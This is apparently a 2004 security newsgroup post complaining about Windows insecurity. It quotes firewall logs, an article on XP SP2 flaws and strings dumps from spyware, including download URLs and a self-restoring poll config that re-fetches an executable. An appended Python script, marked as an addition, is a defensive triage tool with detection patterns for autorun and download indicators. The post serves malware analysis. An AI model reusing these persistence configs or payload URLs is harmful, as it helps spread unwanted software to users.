<Sat Nov 13 01:29:28 2004> 207.46.98.138:4190 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:41:02 2004> 207.46.98.138:3507 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:41:05 2004> 207.46.98.138:3507 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:41:11 2004> 207.46.98.138:3507 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:52:26 2004> 207.46.98.138:3326 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:52:29 2004> 207.46.98.138:3326 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:52:35 2004> 207.46.98.138:3326 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)

Reading the report, we find other hosts which have been/are being targeted:

Netblock        Number of IPs targeted
--------------  ----------------------
216.83.x.x      7
134.29.x.x      5
192.168.x.x     1
134.29.x.x      1

They have had several notices since Oct:
http://www.mynetwatchman.com/ListIncidentActivity.asp?IncidentId=116661437

4 12 Nov 2004 17:44:51 Re-escalation sent to: abuse@microsoft.com
3 5 Nov 2004 13:31:29 Standard escalation email sent to: abuse@microsoft.com
2 21 Oct 2004 05:44:17 Re-escalation sent to: abuse@microsoft.com

The incident report at http://www.mynetwatchman.com/LID.asp?IID=116661437 lists
"HTTP Possible Nachi/CodeRed/Nimda" under "Issue Description". I heard MS is making
anti-virus software now.

It gets better. Then this article, recently released:

 "Ten new security holes in Windows XP Service Pack 2 have been discovered, so
  get ready to insert new patches into your patch management schedule.
  Microsoft recently announced their Security Bulletin Advance Notification
  Program, which gives administrators a several days advance notice of
  upcoming patches, however these new security holes were announced by
  security product maker Finjan Software.

  Finjan said their Malicious Code Research Center discovered the new
  vulnerabilities, at least some of which are very dangerous. A spokesperson
  for the company said "Finjan has provided Microsoft with full technical
  details concerning the vulnerabilities [... ]and has been assisting
  Microsoft to patch these holes. In order to prevent the creation of
  malicious viruses and worms, Finjan will not release any
  technical details about these vulnerabilities until they are fully patched
  by Microsoft."

  Shlomo Touboul, CEO and Founder of Finjan Software, said "Windows XP SP2
  operating system is a continuation of the same Windows XP Operating System
  and Windows Kernel. All Windows versions have been developed with
  requirements for highest backward compatibility and open architecture,
  with maximum productivity and ease of use. In addition, Windows applications
  typically run with administrative permission with full and unlimited
  access to computer resources."

  "This, together with the emerging technology of mobile code has created a
  situation in which active content travels freely over the web and gains
  full control of host computers. These fundamentals create a green field for
  hackers shown by constantly increasing attacks and damage over the last
  few years. A security patch of Windows operating system without changing the
  rules of the game will not be enough to fight the recent complex malicious
  code attacks such as Scob, Mydoom, and others. End users and Enterprises
  must add an independent security layer that is not dependent on the above
  fundamentals. Application level behavior blocking is the leading technology
  designed to immunize systems from both known and unknown vulnerabilities
  and exploits; viruses, worms, Trojans, spyware, phishing and other threats,"
  Touboul continued.

  The vulnerabilities discovered at Finjan could allow attackers to
  "silently and remotely" take control over an affected system when a user visits a
  malicious Web page. As you well know, enticing someone to visit a Web page
  is relatively easy to do.

  The company outlined several scenarios to better explain the risks:

  * Hackers can remotely access users' local files
    Windows(R) XP SP2 is designed to deny access to a local file in the course
    of Internet browsing. Therefore, any attempt by a remote web page to access
    a local file in any way other than downloading a file is denied. Finjan has
    shown that this feature can be remotely compromised by hackers.
  * Hackers can switch between Internet Explorer Security Zones to obtain
    rights of local zone
    Internet Explorer uses the notion of security zones to differentiate
    between mobile codes by their origin. In this way, for example, the
    permissions of files running from the local hard drive are much higher
    than the permissions of code downloaded from the Internet. Finjan has
    shown that it is possible to elevate the privilege level of mobile code
    downloaded from the Internet. By gaining additional privileges, the remote
    code could read, write and execute files on the user's hard drive.
  * Hackers can bypass SP2's notification mechanism on the download and
    execution of EXE files and therefore download files without any warning
    or notification
    One of the mechanisms that have been implemented in SP2 is the
    verification of the download and the execution of content arriving from
    the Internet. This mechanism is implemented by three new features: an
    information bar inside Internet Explorer which filters and blocks
    unauthorized operations performed by web pages, a file download dialog
    which requires the user's confirmation for file save and execution
    operations, and an execution verification dialog. These features are
    important to prevent unauthorized silent "drive-by" installations of
    malicious software."

This just doesn't happen to any other OS:
http://isc.sans.org/diary.php?date=2004-07-23

Some examples of ASCII strings from this fine programming
(from several files removed from a Win XP SP1 machine recently):

The now famous 180Solutions (after a visit to Windows Update, when this issue
was supposedly patched):

open
 /boom_ver=
 /boom_path=
 /did=
Starting Executable................................
Could not start downloaded executable.
Starting Executable...
Could not write the target file.
Could not create the target file.
Downloading Signed File..
Contacting Server...............................
Contacting Server..
180search Assistant
EXE:
ExeDeleteEvent
PID:
"%s" PID:%d EXE:"%s"
Software\Microsoft\Windows\CurrentVersion\Run
Software\180solutions\msbb
Software\180solutions\msbb\Placements
nCASE
msbb
Log:
Log:
Deleted previous log
Settings:
boomdb.txt

This one featured in the URL above:

SOFTWARE\E2G
http://prutect.com/pi.exe
\pi1.exe
Bad url
lastCheck
lastBuild
\IeBHOs.dll
\IeBHOs.new
installDir
build
merchants
e2give.com
&popup=
popup
go/check?build=
checkStarted
IeBHOs.Control
{3643ABC2-21BF-46B9-B230-F247DB0C6FD6}
CLSID
IeBHOs.Control.1
oÖWriteFile
CreateFile
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKCC
In order to finalize removal, you must reboot your computer.
E2Give Plug-in
NoRemove
askearth.com/go/show?t=e2give
\data.new
RegSetValueExA
RegDeleteKeyA
RegEnumKeyExA
RegCreateKeyExA
RegDeleteValueA
URLDownloadToFileA
DllRegisterServer

IeBHOs 1.0 Type LibraryWWW
Control BHO ClassW
Created by MIDL version 6.00.0361 at Mon Oct 25 17:59:51 2004
HKCR {
        NoRemove AppID {
                '{3B99F202-145A-4E5A-AC7B-88A36910BF5E}' = s 'IeBHOs'
                'IeBHOs.DLL' {
                        val AppID = s '{3B99F202-145A-4E5A-AC7B-88A36910BF5E}'
HKLM {
        NoRemove Software {
                NoRemove Microsoft {
                        NoRemove Windows {
                                NoRemove CurrentVersion {
                                        NoRemove Explorer {
                                         NoRemove 'Browser Helper Objects' {
                  ForceRemove '{3643ABC2-21BF-46B9-B230-F247DB0C6FD6}'
  }

This one regenerates itself if you try to remove it (Agent.I). Note
the name of the server; how appropriate ;) :

<?xml version="1.0" ?>
<poll interval="60000" recoveryinterval="86400000" configtype="test">
  <restoreIf url="http://static.callinghome.biz/download/cabs/THNALL1R/thnall1r.exe" hive="HKLM" key="Software\Vendor\xml">
    <missing>
      <reg hive="HKLM" key="SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{000020DD-C72E-4113-AF77-DD56626C6C42}" />
    </missing>

DCOM. IFRAME. Adobe "steam" issue. CHM. Lsass. gdiplus. It never ends... How
can this be secure? And last, someone having an opinion different from yours,
no matter how strongly they feel about it, is not a "troll". This is a group
which discusses matters related to comp. security and that is what that was.
People will use what they will; if someone makes a statement which I feel is
incorrect, then I will attempt to prove it wrong with the facts I have and
what I know, have seen, or done.

-- 
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++
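As an added example (not part of the original post), here is a defender-side triage script in Python that classifies strings-dump lines like those quoted above into persistence and download indicators, and parses the `<poll>` config to list the registry keys whose absence triggers the self-restore. The sample inputs are constructed from the strings the post quotes; the indicator patterns are my own assumed heuristics, not a published signature set.

```python
import re
import xml.etree.ElementTree as ET
# Constructed sample in the shape of the strings dumps quoted in the post.
SAMPLE_STRINGS = """\
Software\\Microsoft\\Windows\\CurrentVersion\\Run
http://prutect.com/pi.exe
\\IeBHOs.dll
{3643ABC2-21BF-46B9-B230-F247DB0C6FD6}
RegSetValueExA
URLDownloadToFileA
DllRegisterServer
"""

# Constructed sample in the shape of the <poll> config quoted in the post.
SAMPLE_POLL_XML = """<?xml version="1.0" ?>
<poll interval="60000" recoveryinterval="86400000" configtype="test">
  <restoreIf url="http://static.callinghome.biz/download/cabs/THNALL1R/thnall1r.exe" hive="HKLM" key="Software\\Vendor\\xml">
    <missing>
      <reg hive="HKLM" key="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{000020DD-C72E-4113-AF77-DD56626C6C42}" />
    </missing>
  </restoreIf>
</poll>
"""
# Indicator classes (assumed heuristics, not an official signature set).
INDICATORS = {
    "autorun_key": re.compile(r"\\CurrentVersion\\Run$", re.I),
    "bho_registration": re.compile(r"Browser Helper Objects|IeBHO|DllRegisterServer", re.I),
    "clsid": re.compile(r"\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}", re.I),
    "download_url": re.compile(r"https?://\S+\.(?:exe|dll|cab)$", re.I),
    "download_api": re.compile(r"^URLDownloadToFile[AW]?$"),
    "registry_api": re.compile(r"^Reg(?:Set|Create|Delete|Enum)\w*[AW]$"),
}

def triage_strings(text):
    """Map each indicator class to the strings(1)-style lines that matched it."""
    hits = {name: [] for name in INDICATORS}
    for line in (l.strip() for l in text.splitlines()):
        for name, pat in INDICATORS.items():
            if pat.search(line):
                hits[name].append(line)
    return hits

def parse_poll_config(xml_text):
    """Extract the self-restore logic: the payload re-downloaded and the registry keys watched."""
    root = ET.fromstring(xml_text)
    restores = []
    for r in root.findall("restoreIf"):
        watched = [k.get("hive") + "\\" + k.get("key") for k in r.findall("missing/reg")]
        restores.append({"url": r.get("url"), "watched_keys": watched})
    return {"interval_ms": int(root.get("interval", "0")), "restores": restores}
```

The watched_keys list is the practical output: every key in it must be removed together with the poller itself, or the BHO comes back on the next poll interval.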

